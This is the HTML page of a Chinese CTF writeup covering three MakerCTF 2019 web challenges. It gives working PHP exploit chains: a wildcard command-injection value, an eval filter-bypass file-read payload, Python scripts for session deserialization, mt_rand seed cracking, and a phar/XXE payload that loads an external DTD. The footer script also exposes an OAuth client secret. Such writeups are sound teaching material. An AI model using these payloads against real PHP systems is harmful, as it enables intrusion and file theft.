<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Pineapple 通过扫描可以发现存在git源码泄露，进一步发现index.php中存在反序列化点: 12345$info &#x3D; @$_GET[&amp;#x27;info&amp;#x27;];$lyric &#x3D; @$_GET[&amp;#x27;lyric&amp;#x27;]; &#x2F;&#x2F; php:&#x2F;&#x2F;inputif(isset($lyric)&amp;&amp;(@file_get_contents($lyric,&amp;#x27;r">
<meta property="og:type" content="article">
<meta property="og:title" content="MakerCTF 2019 部分Web题目 Writeup">
<meta property="og:url" content="https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/index.html">
<meta property="og:site_name" content="Frank">
<meta property="og:description" content="Pineapple 通过扫描可以发现存在git源码泄露，进一步发现index.php中存在反序列化点: 12345$info &#x3D; @$_GET[&amp;#x27;info&amp;#x27;];$lyric &#x3D; @$_GET[&amp;#x27;lyric&amp;#x27;]; &#x2F;&#x2F; php:&#x2F;&#x2F;inputif(isset($lyric)&amp;&amp;(@file_get_contents($lyric,&amp;#x27;r">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-04-14T16:00:00.000Z">
<meta property="article:modified_time" content="2021-04-11T21:38:53.000Z">
<meta property="article:author" content="Frank Li">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>MakerCTF 2019 部分Web题目 Writeup</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
<!-- hexo injector head_end start -->
<style>
    .card {
        border-radius: 5px;
        border: 1px solid;
        border-color: #eee #ddd #bbb;
        box-shadow: rgba(0,0,0,.14) 0 1px 3px;
        text-align: center;  
        float: left;
        padding: 10px;
        margin: 10px;
    }
    .card .avatar {
        display: block;
        width: calc(100% - 20px);
        height: calc(100% - 20px);
        align-content: center;
        margin: auto
    }
    .card .title { white-space: nowrap; }
    @media screen and (max-width: 480px) {
        .card { width: calc(33% - 20px); }
    }
    @media screen and (max-width: 600px) and (min-width: 481px) {
        .card { width: calc(25% - 20px); }
    }
    @media screen and (min-width: 601px) {
        .card { width: calc(20% - 20px); }
    }
    .card-container { width: 90%; }
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/atom.xml" title="Frank" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "icons.top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2019/04/22/Security/Writeup/CISCN%202019/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2018/08/26/Security/Writeup/moeCTF2018/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&text=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&is_video=false&description=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=MakerCTF 2019 部分Web题目 Writeup&body=Check out this article: https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&name=MakerCTF 2019 部分Web题目 Writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&t=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Pineapple"><span class="toc-number">1.</span> <span class="toc-text">Pineapple</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Regex-and-PHP-are-the-best"><span class="toc-number">2.</span> <span class="toc-text">Regex and PHP are the best</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#can-u-see-the-flag"><span class="toc-number">3.</span> <span class="toc-text">can u see the flag</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        MakerCTF 2019 部分Web题目 Writeup
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Frank Li</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-04-14T16:00:00.000Z" itemprop="datePublished">2019-04-15</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="tag-link-link" href="/tags/Writeup/" rel="tag">Writeup</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="Pineapple">Pineapple</h2>
<p>通过扫描可以发现存在git源码泄露，进一步发现index.php中存在反序列化点:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$info</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;info&#x27;</span>];</span><br><span class="line"><span class="variable">$lyric</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;lyric&#x27;</span>]; <span class="comment">// php://input</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$lyric</span>)&amp;&amp;(@file_get_contents(<span class="variable">$lyric</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;I want to eat pineapple&quot;</span>))&#123;</span><br><span class="line">    unserialize(<span class="variable">$info</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>及工具类Blog:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Blog</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>=<span class="string">&quot;Music&quot;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$blacklist</span> = [<span class="string">&quot;\&quot;&quot;</span>, <span class="string">&quot;ls&quot;</span>, <span class="string">&quot;curl&quot;</span>, <span class="string">&quot;-&quot;</span>];</span><br><span class="line">        <span class="comment">// PATH中存在的文件名基本都ban了</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$blacklist</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span>(stripos(<span class="keyword">$this</span>-&gt;file,<span class="variable">$value</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;Attack!&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">         &#125;</span><br><span class="line">        system(<span class="string">&quot;php ./templates/<span class="subst">$this</span>-&gt;file.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>且提示了flag存在于templates/Secrets.php文件中<br>
显而易见，Blog类system函数的调用中存在命令拼接，而shell中的通配符可以帮助我们绕过waf<br>
所以令 <code>Blog-&gt;file = &quot;;/???/???\t./templates/Secrets&quot;;</code> 即可</p>
<h2 id="Regex-and-PHP-are-the-best">Regex and PHP are the best</h2>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>网上能搜到原题，此处总结一下各种可能能利用的函数</p>
<ol>
<li><code>getallheaders()</code> (在5.5.7之前只存在于apache php模块中)</li>
<li><code>get_defined_vars()</code></li>
<li><code>session_id(session_start())</code></li>
</ol>
<p>还存在一个比较刁钻的payload:<br>
<code>readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))))</code></p>
<h2 id="can-u-see-the-flag">can u see the flag</h2>
<p>首先通过extract变量覆盖读phpinfo：<code>func=extract&amp;func_0=phpinfo</code><br>
可以发现php版本为7.0.33</p>
<p>回到变量覆盖，发现实际上无法直接进行反序列化，遂回到phpinfo继续寻找突破口</p>
<blockquote>
<p>其实此时可以通过fuzz找出可以接收一个数组作为参数的函数发现session反序列化</p>
</blockquote>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">session.serialize_handler</span> = php_serialize</span><br><span class="line"><span class="attr">session.upload_progress.enabled</span> = <span class="literal">On</span></span><br><span class="line"><span class="attr">session.upload_progress.cleanup</span> = <span class="literal">Off</span></span><br></pre></td></tr></table></figure>
<p>可以发现上述配置项允许我们通过session注入进行反序列化<br>
再次回到变量覆盖，将<code>func_0</code>覆盖为<code>session_start</code>。<br>
此时，要进行反序列化还需要更改<code>serialize_handler</code>，观察php文档发现session_start可以接受一个<code>$opts</code>参数更改session相关配置。之后就是烦人的套娃了</p>
<p>所以第一关的exploit如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> phpserialize <span class="keyword">import</span> serialize</span><br><span class="line"><span class="keyword">from</span> requests <span class="keyword">import</span> session</span><br><span class="line"></span><br><span class="line">ses = session()</span><br><span class="line">host = <span class="number">1</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">maker_r</span>:</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">maker_e</span>:</span></span><br><span class="line">        <span class="class"><span class="keyword">class</span> <span class="title">maker_w</span>:</span></span><br><span class="line">            <span class="class"><span class="keyword">class</span> <span class="title">maker_q</span>:</span></span><br><span class="line">                <span class="class"><span class="keyword">class</span> <span class="title">get_flag</span>:</span></span><br><span class="line">                    get1 = <span class="string">&#x27;get_flag::flag1&#x27;</span></span><br><span class="line">                    protected_get2 = <span class="string">&#x27;\\f1a9&#x27;</span></span><br><span class="line">                q1 = get_flag()</span><br><span class="line">                private_q2 = <span class="literal">None</span></span><br><span class="line">            w1 = maker_q()</span><br><span class="line">            private_w2 = <span class="literal">None</span></span><br><span class="line">        e1 = maker_w()</span><br><span class="line">        private_e2 = <span class="literal">None</span></span><br><span class="line">    r1 = <span class="literal">None</span></span><br><span class="line">    r2 = maker_e()</span><br><span class="line"></span><br><span class="line">payload = serialize(maker_r())</span><br><span class="line"></span><br><span class="line">ses.get(host + <span class="string">&#x27;/welcome.php&#x27;</span>, params=&#123;</span><br><span class="line">    <span class="string">&#x27;func&#x27;</span>: <span class="string">&#x27;extract&#x27;</span>, <span class="string">&#x27;func_0&#x27;</span>: <span class="string">&#x27;session_start&#x27;</span></span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">ses.post(host + <span class="string">&#x27;/welcome.php&#x27;</span>, params=&#123;</span><br><span class="line">    <span class="string">&#x27;func&#x27;</span>: <span class="string">&#x27;extract&#x27;</span>, <span class="string">&#x27;func_0&#x27;</span>: <span class="string">&#x27;session_start&#x27;</span></span><br><span class="line">&#125;, files=&#123;<span class="string">&#x27;a&#x27;</span>: <span class="string">&#x27;b&#x27;</span>&#125;, data=&#123;</span><br><span class="line">    <span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">&#x27;|&#x27;</span> + payload</span><br><span class="line">&#125;)</span><br><span class="line"><span class="comment"># 此时session文件中的内容为：https://paste.ubuntu.com/p/QBsH3gyx8q/，挺有趣的</span></span><br><span class="line"></span><br><span class="line">ret = ses.post(host + <span class="string">&#x27;/welcome.php&#x27;</span>, params=&#123;</span><br><span class="line">    <span class="string">&#x27;func&#x27;</span>: <span class="string">&#x27;extract&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;func_0&#x27;</span>: <span class="string">&#x27;session_start&#x27;</span></span><br><span class="line">&#125;, data=&#123;</span><br><span class="line">    <span class="string">&#x27;serialize_handler&#x27;</span>: <span class="string">&#x27;php&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;s&#x27;</span>: <span class="string">&#x27;something&#x27;</span></span><br><span class="line">&#125;).text</span><br><span class="line"><span class="built_in">print</span>(ret)</span><br></pre></td></tr></table></figure>
<p>根据第一关的答案，我们能拿到第二关的源码，并且知道了第二关flag的位置。在classes.php中我们发现有两个key，其中admin_key没有给出，而出题人提示两个key的生成方式如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Secret</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$maker_key</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$admin_key</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;admin_key = <span class="keyword">$this</span>-&gt;gen_secret();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;maker_key = <span class="keyword">$this</span>-&gt;gen_secret(<span class="number">10</span>); <span class="comment">// )l)h3X3Gye</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">gen_secret</span>(<span class="params"><span class="variable">$len</span> = <span class="number">8</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$chars</span> = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&amp;*()&#x27;</span>;</span><br><span class="line">        <span class="variable">$passwd</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$len</span>; <span class="variable">$i</span>++ )</span><br><span class="line">            <span class="variable">$passwd</span> .= substr(<span class="variable">$chars</span>, mt_rand(<span class="number">0</span>, strlen(<span class="variable">$chars</span>) - <span class="number">1</span>), <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$passwd</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>mt_rand</code>随机数生成器非密码学安全<br>
可以利用工具（比如php_mt_seed）爆破出seed，得到<code>admin_key = &quot;!XPiScRy&quot;</code><br>
观察两个key的区别，我们能够发现maker_key只能将已经存在的<code>maker.gif</code>移动到<code>/var/www/data</code>目录下，且无法获得生成的文件名，而admin_key不仅可以访问/写入任意文件<strong>内容</strong>，还能获得生成的文件名<br>
所以这个文件名有什么用呢？不能直接访问（不在web目录下），而我们能控制的能访问到本地文件的只有那个<code>file_get_contents</code>，这时我们就能联想到phar反序列化了</p>
<blockquote>
<p>有一个需要注意的点是file_get_contents的url第一个字符不能为p，此时我们可以通过套娃套一个stream即可，比如压缩流</p>
</blockquote>
<p>所以现在要反序列化什么类呢？如果只是要反序列化php自带的类的话那用第一关的反序列化点就行了，没必要再来一个，所以我们的目标缩小到classes中有的类。<br>
这时我们能发现Move类能够调用任意类的任意函数，参数都没有任何限制，极大地扩展了攻击面。后面就随便搞了。</p>
<p>比如可以利用XXE读flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Move</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$d</span> = &lt;&lt;&lt;str</span><br><span class="line"><span class="meta">&lt;?</span>xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE foo [ &lt;!ENTITY % pe SYSTEM <span class="string">&quot;https://files.frankli.site/xxe/xxe.dtd&quot;</span>&gt; %pe; %param1; ]&gt;</span><br><span class="line">&lt;foo&gt;&lt;/foo&gt;</span><br><span class="line">&amp;external;</span><br><span class="line">str;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;n = <span class="keyword">array</span>(<span class="variable">$d</span>, LIBXML_NOENT);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;m = <span class="string">&quot;SimpleXMLElement&quot;</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;k = <span class="string">&quot;!XPiScRy&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$x</span> = <span class="keyword">new</span> Phar(<span class="string">&quot;payload.phar.gif&quot;</span>);</span><br><span class="line"><span class="variable">$x</span>-&gt;startBuffering();</span><br><span class="line"><span class="variable">$x</span>-&gt;setStub(<span class="string">&quot;GIF89a &lt;?php __HALT_COMPILER();?&gt;&quot;</span>);</span><br><span class="line"><span class="variable">$x</span>-&gt;setMetadata(<span class="keyword">new</span> Move());</span><br><span class="line"><span class="variable">$x</span>-&gt;addFromString(<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;b&#x27;</span>);</span><br><span class="line"><span class="variable">$x</span>-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>
<p>exploit:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;payload.phar.gif&#x27;</span>, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    payload = base64.b64encode(f.read()).decode()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">access</span>(<span class="params">n</span>):</span></span><br><span class="line">    <span class="keyword">return</span> requests.post(<span class="string">&#x27;http://localhost/maker.php&#x27;</span>, params=&#123;</span><br><span class="line">        <span class="string">&#x27;who&#x27;</span>: <span class="string">&#x27;maker&#x27;</span>, <span class="string">&#x27;do&#x27;</span>: <span class="string">&#x27;move&#x27;</span>, <span class="string">&#x27;url&#x27;</span>: n</span><br><span class="line">    &#125;, data=&#123;<span class="string">&#x27;key&#x27;</span>: <span class="string">&#x27;!XPiScRy&#x27;</span>&#125;)</span><br><span class="line"></span><br><span class="line">ret1 = access(<span class="string">&#x27;data:text/plain;base64,&#x27;</span> + payload).text</span><br><span class="line">filename = <span class="built_in">__import__</span>(<span class="string">&#x27;re&#x27;</span>).findall(<span class="string">&#x27;[a-zA-Z0-9]*.gif&#x27;</span>, ret1)[<span class="number">1</span>]</span><br><span class="line"><span class="built_in">print</span>(access(<span class="string">&#x27;compress.zlib://phar:///var/www/maker/&#x27;</span> + filename).text)</span><br></pre></td></tr></table></figure>

<div id="gitalk-container"></div>
<script src="https://cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script><link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css"><script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

		<script>
		var gitalkConfig = {"clientID":"5955d155fe2ea768241e","clientSecret":"f96bbda9ff434950217f24f7f9369f8b8de3b025","repo":"frankli0324.github.io","owner":"frankli0324","admin":["frankli0324"],"distractionFreeMode":false};
	    gitalkConfig.id = md5(location.pathname);
		var gitalk = new Gitalk(gitalkConfig);
	    gitalk.render("gitalk-container");
	    </script><link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
  </div>
</article>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Pineapple"><span class="toc-number">1.</span> <span class="toc-text">Pineapple</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Regex-and-PHP-are-the-best"><span class="toc-number">2.</span> <span class="toc-text">Regex and PHP are the best</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#can-u-see-the-flag"><span class="toc-number">3.</span> <span class="toc-text">can u see the flag</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&text=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&is_video=false&description=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=MakerCTF 2019 部分Web题目 Writeup&body=Check out this article: https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2019/04/15/Security/Writeup/MakerCTF%202019/&title=MakerCTF 2019 部分Web题目 Writeup"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
